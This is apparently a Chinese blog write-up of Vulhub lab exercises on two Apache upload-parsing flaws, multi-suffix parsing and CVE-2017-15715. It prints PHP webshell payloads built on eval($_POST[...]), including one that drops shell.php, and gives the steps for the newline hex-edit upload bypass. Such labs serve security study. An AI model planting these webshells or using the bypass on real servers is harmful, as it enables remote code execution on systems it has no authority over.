Vulnhub靶场Apache解析漏洞

一.apache_parsing

原理:Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析,就再往左判断。如 1.php.xxxxx

打开靶场

创建一个名为1.php.jpg的文件,内容输入

复制代码
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

上传。。。

他会生成一个内容是<?php eval($_POST["cmd"]);?>名为shell.php的文件

我们拼接网址访问

测试是否上传成功

二.CVE-2017-15715

原理:Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全策略。

影响版本:2.4.0~2.4.29

进入靶场

创建一个内容为<?php @eval($_POST['a']); ?>名为1.jpg的文件

上传,抓包

在evil.php⽂件后⾯添加空格

在到HEX中找到evil.php的那一行,把20改成0a

放行,访问evil.php%0a

写入成功!!!

相关推荐
unable code13 小时前
攻防世界-Misc-Wire1
网络安全·ctf·misc·1024程序员节
浔川python社18 小时前
《C++ 小程序编写系列》(第四部):实战:简易图书管理系统(类与对象篇)
java·开发语言·apache
一岁天才饺子20 小时前
SSRF漏洞绕过与漏洞解决
网络·网络安全·ssrf
Chengbei1120 小时前
fastjson 原生反序列化配合动态代理绕过限制
java·安全·网络安全·系统安全·安全架构
m0_4660499721 小时前
Webgoat-(A1)Broken Access Control:Hijack a session
web安全·网络安全
Chengbei111 天前
CVE-2025-24813 Tomcat 最新 RCE 分析复现
java·安全·web安全·网络安全·tomcat·系统安全·网络攻击模型
QZ166560951591 天前
2025年国内精细化、可交互、轻量级的泛监测体系产品推荐
网络安全
GoldY丶1 天前
【Geek渗透之路】小迪安全笔记——web安全(3)
笔记·安全·web安全·网络安全·安全威胁分析
晚风(●•σ )1 天前
【华为 ICT & HCIA & eNSP 习题汇总】——题目集27
网络·计算机网络·网络安全·华为
unable code2 天前
攻防世界-Misc-Miscellaneous-200
网络安全·ctf·misc